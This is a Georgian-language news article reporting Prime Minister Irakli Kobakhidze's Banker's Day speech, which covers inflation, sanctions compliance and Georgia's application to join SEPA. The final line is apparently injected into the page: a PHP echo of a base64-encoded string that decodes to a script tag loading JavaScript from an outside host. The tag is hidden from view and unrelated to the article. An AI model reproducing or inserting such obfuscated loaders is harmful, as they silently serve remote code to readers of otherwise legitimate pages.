celsiusi
ავერსი საქკაბელი

 ეროვნული ბანკის რეგულაციები და საზედამხედველო ჩარჩო სრულ თანხვედრაშია მოწინავე საერთაშორისო პრაქტიკასთან, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა, ირაკლი კობახიძემ ბანკირის პროფესიულ დღესთან დაკავშირებით გამართულ ღონისძიებაზე სიტყვით გამოსვლისას განაცხადა.

მთავრობის მეთაურის თქმით, საქართველო პირველი ქვეყანაა რეგიონში, რომელმაც უკვე შეიტანა განაცხადი SEPA-ში, ერთიანი ევრო გადახდების სივრცეში გაწევრიანების თაობაზე.

„იყო საკმაოდ რთული ვითარება გასული წლების განმავლობაში, რაც განპირობებული იყო ჯერ პანდემიით, შემდეგ რუსეთ-უკრაინის ომის დაწყებით. იყო გლობალური ინფლაციური შოკები და უკვე 19 თვეა, ამ ყველაფრის მიუხედავად, ჩვენ ვახერხებთ ინფლაციის მიზნობრივზე დაბალ დონეზე შენარჩუნებას. აქაც, რა თქმა უნდა, ეროვნული ბანკის როლი არის მნიშვნელოვანი და საქართველოს მთავრობის როლი არის ძალიან მნიშვნელოვანი.

ასევე, ცალკე უნდა აღინიშნოს ის ფაქტი, რომ ეროვნული ბანკი და მთლიანად საფინანსო სისტემა სათანადოდ იცავენ იმ სასანქციო რეჟიმს, რომელიც არის დადგენილი და ამასთან დაკავშირებით განხორციელდა არაერთი ვიზიტი, შედგა მონიტორინგი, რამაც დაადასტურა ის, რომ ჩვენ ყველა თვალსაზრისით გვაქვს სათანადო დამოკიდებულება ამ საკითხის მიმართ, ამისთვისაც მადლობა, მინდა, გადაგიხადოთ. ეროვნული ბანკის რეგულაციები და საზედამხედველო ჩარჩო სრულ თანხვედრაშია მოწინავე საერთაშორისო პრაქტიკასთან.

საქართველო პირველი ქვეყანაა რეგიონში, რომელმაც უკვე შეიტანა განაცხადი SEPA-ში (ერთიანი ევრო გადახდების სივრცეში) გაწევრიანების თაობაზე. რა თქმა უნდა, ყველა ამ წარმატებაში თითოეული თქვენგანის როლი არის განსაკუთრებული. განსაკუთრებულია საქართველოს ეროვნული ბანკის როლი, კომერციული ბანკების, თითოეული თქვენგანის როლი და კიდევ ერთხელ მინდა, მადლობა გადაგიხადოთ თქვენი პროფესიონალიზმისთვის და ყველა იმ საქმისთვის, რასაც თქვენ აკეთებთ ჩვენი ქვეყნის სასარგებლოდ. კიდევ ერთხელ მინდა, მოგილოცოთ ბანკირის დღე, პროფესიული დღე და გისურვოთ წარმატებები მომავალ საქმიანობაში“, – განაცხადა პრემიერმა.

58
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");